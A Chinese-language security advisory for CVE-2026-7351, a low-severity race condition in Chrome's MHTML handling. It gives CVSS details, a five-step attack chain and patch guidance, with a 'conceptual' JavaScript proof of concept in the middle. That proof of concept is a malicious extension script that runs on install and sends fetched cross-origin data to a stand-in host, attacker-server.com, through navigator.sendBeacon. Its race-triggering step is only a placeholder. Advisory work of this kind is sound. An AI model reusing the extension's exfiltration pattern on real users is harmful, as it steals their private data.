CVE-2026-7351 Chrome MHTML竞态条件漏洞

漏洞信息

漏洞编号

CVE-2026-7351

漏洞类型

竞态条件

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome 147.0.7727.138之前版本中的MHTML处理模块存在竞态条件漏洞。攻击者通过诱导用户安装恶意Chrome扩展程序，利用精心构造的扩展代码触发竞态，从而绕过浏览器的同源策略限制，泄露敏感的跨源数据。该漏洞攻击复杂度较高，且需要用户进行特定交互操作，主要对用户数据的机密性构成威胁。

技术细节

该漏洞的核心在于Google Chrome浏览器处理MHTML（Multipurpose Internet Mail Extensions HTML）格式内容时存在的竞态条件漏洞。MHTML允许将网页所有资源（如HTML、图片、脚本）打包成单个文件，通常用于存档。漏洞产生于浏览器解析MHTML流的特定阶段，未能正确处理并发访问或状态变更。攻击者首先需要诱导用户安装一个恶意构造的Chrome扩展程序。该扩展程序被设计为在特定时机触发对MHTML内容的解析或操作。由于存在竞态窗口，扩展程序可以在浏览器对MHTML资源进行安全检查（CORS验证）与实际使用资源之间，通过某种方式篡改上下文或插入恶意载荷。这种时序上的漏洞打破了浏览器的同源策略（SOP）防御机制，使得恶意扩展能够访问并窃取其他源站点的敏感数据，如Cookie、用户信息或私有页面内容。尽管利用该漏洞需要用户交互（安装扩展）且攻击复杂度较高，但其直接导致的数据泄露后果在隐私保护场景下不容忽视。

攻击链分析

STEP 1

诱导安装

攻击者通过社会工程学手段诱导用户下载并安装一个恶意构造的Chrome扩展程序。

STEP 2

触发解析

恶意扩展在用户浏览特定网页或触发特定事件时，发起对MHTML内容的请求或操作。

STEP 3

竞态利用

扩展程序利用MHTML解析过程中的竞态窗口，在安全检查与资源使用之间插入恶意操作。

STEP 4

绕过策略

通过竞态条件成功绕过浏览器的同源策略（SOP），读取到其他域名的敏感数据。

STEP 5

数据回传

将窃取的跨源数据通过后台网络请求发送至攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for Race Condition in MHTML handling via Extension
// This script runs in the background of a malicious extension.

const TARGET_URL = "https://target-site.com/sensitive.mhtml";
const LEAK_URL = "https://attacker-server.com/collect";

async function exploitRaceCondition() {
    // Step 1: Initiate fetch of MHTML content
    const fetchPromise = fetch(TARGET_URL);

    // Step 2: Execute logic to trigger the race window during parsing
    // This might involve rapid garbage collection or DOM manipulation
    triggerRaceWindow();

    try {
        const response = await fetchPromise;
        const data = await response.text();
        
        // Step 3: Check if cross-origin data was leaked
        if (data.includes("SECRET_TOKEN")) {
            exfiltrate(data);
        }
    } catch (error) {
        console.log("Exploit attempt failed, retrying...");
    }
}

function triggerRaceWindow() {
    // Simulate operations intended to desynchronize MHTML parser
    // In a real exploit, this would precisely time operations with the browser's rendering loop
    let temp = [];
    for(let i=0; i<1000; i++) {
        temp.push(new Array(1000).fill('x')); // Memory pressure
    }
}

function exfiltrate(data) {
    // Send leaked data to attacker
    navigator.sendBeacon(LEAK_URL, data);
}

chrome.runtime.onInstalled.addListener(() => {
    exploitRaceCondition();
});

影响范围

Google Chrome < 147.0.7727.138

防御指南

临时缓解措施

建议用户立即将Google Chrome浏览器更新至147.0.7727.138或更高版本以修复此漏洞。在未修复前，用户应提高警惕，避免安装来源不明的浏览器扩展程序，并仔细审查已安装扩展的权限，以降低被恶意扩展利用该漏洞窃取数据的风险。